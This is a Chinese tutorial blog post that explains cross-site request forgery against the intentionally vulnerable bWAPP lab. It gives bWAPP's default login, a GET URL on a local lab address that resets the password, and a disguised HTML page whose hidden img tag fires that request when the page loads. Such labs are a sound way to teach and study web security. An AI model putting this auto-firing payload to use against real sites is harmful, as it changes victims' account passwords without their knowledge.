温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何解析CSRF漏洞

发布时间:2021-12-09 18:52:03 来源:亿速云 阅读:144 作者:柒染 栏目:大数据

这篇文章给大家介绍如何解析CSRF漏洞,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作

CSRF和XSS区别:

1、CSRF需要登陆后操作,XSS不需要

2、CSRF通过伪装成受信任用户请求受信任的网站

一、环境:BWAPP

二、登陆,默认账号为:bee,密码为:bug

如何解析CSRF漏洞

三、选择从在csrf的页面,将密码修改为1111,change

四、分析url

http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

五、退出账号,重新登陆一下,密码已经修改为1111

六、重修修改一下url,直接访问这个这个地址,

http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change

密码被重置为2222

七、隐蔽利用

1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,

<!DOCTYPE html> <html> <head> <title>哎呦不错哦。。。</title> </head> <body> <h3>好久不见<h3> <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change"> </body> </html>

2、访问这个html,自动访问修改后的url,密码也自动修改了

关于如何解析CSRF漏洞就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI